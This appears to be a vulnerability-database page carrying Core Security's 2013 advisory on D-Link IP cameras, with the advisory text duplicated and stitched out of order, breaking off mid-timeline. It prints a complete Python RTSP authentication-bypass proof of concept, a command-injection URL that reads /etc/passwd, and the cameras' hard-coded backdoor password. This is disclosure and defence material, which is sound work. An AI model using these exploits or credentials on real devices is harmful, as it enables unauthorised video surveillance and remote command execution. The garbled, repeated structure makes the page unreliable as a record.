O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only present in DESCRIBE requests but not in
every subsequent request.
2. When the RTSP session is being established, the authentication
request of current session is ignored (a previously stored response is
used instead).
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class DLink(Camera):
# D-Link DCS-2102/1.06-5731
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return
'\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, DLink((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
7.5. *RTSP Hard-Coded Credentials*
[CVE-2013-1603] RTSP service contains hard-coded credentials that
effectively serve as a backdoor, which allows remote attackers to access
the RTSP video stream.
/-----
username: (any)
password: ?*
-----/
As we can see in the following dump, the submitted password is compared
with the string ':?*' (the character ':' is used for concatenation of
'username:password'). This code belongs to the binary 'rtspd':
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
8. *Report Timeline*
. 2013-03-19:
Core Security Technologies notifies the D-Link team of the vulnerability. 2013-03-20:
D-Link team asks for a technical description of the vulnerability. 2013-03-20:
Core sends a draft advisory with technical details and set the estimated
publication date of the advisory for May 14th, 2013. 2013-03-20:
Vendor notifies that D-Link Corporation has an unpublished bounty
program for security advisors. The bounty program requires both Core
Security and D-Link to sign a memo of understanding (MoU). 2013-03-25:
Core notifies that receiving money from vendors may bias the view of the
report and rejects the bounty program. 2013-03-29:
Vendor notifies that they hope to close the fix ASAP. 2013-04-08:
Vendor sends the list of vulnerable devices and the associated firmware
and notifies that they will release patches and release notes on the
D-Link support forum first. Then, an official public release will be
announced (approx. 1 month from forum post to full release). 2013-04-24:
Core asks for a clarification regarding the D-Link release date and
notifies that releasing fixes to a privileged closed group and/or a
closed forum or list is unacceptable. 2013-04-25:
Vendor notifies that the patches are ready and scheduled for posting on
D-Link web site over the next few days. 2013-04-26:
Core notifies that the advisory is re-scheduled for Monday 29th. 2013-04-29:
Advisory CORE-2013-0303 published.
9. *References*
[1] http://www.dlink.com/us/en/home-solutions/view/network-cameras.
[2]
http://corelabs.coresecurity.com/themes/sample_theme/images/coffee-pot.png.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201305-0160 | CVE-2013-1229 | 64-bit Run on the platform Cisco TelePresence Management Suite Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
TMSSNMPService.exe in TelePresence Manager in Cisco TelePresence Management Suite (TMS) on 64-bit platforms allows remote attackers to cause a denial of service (process crash) via SNMP traps, aka Bug ID CSCue00028.
Successfully exploiting this issue may allow an attacker to cause a denial of service condition.
This issue is being tracked by Cisco Bug ID CSCue00028
| VAR-202001-0843 | CVE-2013-1603 |
plural D-Link Vulnerability in using hardcoded credentials in product
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Authentication vulnerability exists in D-LINK WCS-1100 1.02, TESCO DCS-2121 1.05_TESCO, TESCO DCS-2102 1.05_TESCO, DCS-7510 1.00, DCS-7410 1.00, DCS-6410 1.00, DCS-5635 1.01, DCS-5605 1.01, DCS-5230L 1.02, DCS-5230 1.02, DCS-3430 1.02, DCS-3411 1.02, DCS-3410 1.02, DCS-2121 1.06_FR, DCS-2121 1.06, DCS-2121 1.05_RU, DCS-2102 1.06_FR, DCS-2102 1.06, DCS-2102 1.05_RU, DCS-1130L 1.04, DCS-1130 1.04_US, DCS-1130 1.03, DCS-1100L 1.04, DCS-1100 1.04_US, and DCS-1100 1.03 due to hard-coded credentials that serve as a backdoor, which allows remote attackers to access the RTSP video stream. plural D-Link The product contains a vulnerability involving the use of hard-coded credentials.Information may be obtained. There are security vulnerabilities in multiple D-Link webcam products. The account username is arbitrary and the password is \"?*\".
Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access.
http://drupal.org/node/207891. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. *Vulnerability Description*
Multiple vulnerabilities have been found in D-Link IP cameras [1] that
could allow an unauthenticated remote attacker:
1. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection*
[CVE-2013-1599] A security issue located in '/var/www/cgi-bin/rtpd.cgi'
allows an unauthenticated remote attacker to execute arbitrary commands
through the camera's web interface. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain
spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet basically ensures that there are no
spaces in '$QUERY_STRING'. The last line uses 'sed' to replace
ampersands '&' with spaces, and then call to the function 'eval()',
resulting in a typical command injection. For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
7.2. *ASCII Video Stream Information Leak*
[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only present in DESCRIBE requests but not in
every subsequent request.
2. When the RTSP session is being established, the authentication
request of current session is ignored (a previously stored response is
used instead).
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class DLink(Camera):
# D-Link DCS-2102/1.06-5731
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return
'\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, DLink((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
7.5.
/-----
username: (any)
password: ?*
-----/
As we can see in the following dump, the submitted password is compared
with the string ':?*' (the character ':' is used for concatenation of
'username:password'). This code belongs to the binary 'rtspd':
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
8. *Report Timeline*
. 2013-03-19:
Core Security Technologies notifies the D-Link team of the vulnerability. 2013-03-20:
D-Link team asks for a technical description of the vulnerability. 2013-03-20:
Core sends a draft advisory with technical details and set the estimated
publication date of the advisory for May 14th, 2013. 2013-03-20:
Vendor notifies that D-Link Corporation has an unpublished bounty
program for security advisors. The bounty program requires both Core
Security and D-Link to sign a memo of understanding (MoU). 2013-03-25:
Core notifies that receiving money from vendors may bias the view of the
report and rejects the bounty program. 2013-03-29:
Vendor notifies that they hope to close the fix ASAP. 2013-04-08:
Vendor sends the list of vulnerable devices and the associated firmware
and notifies that they will release patches and release notes on the
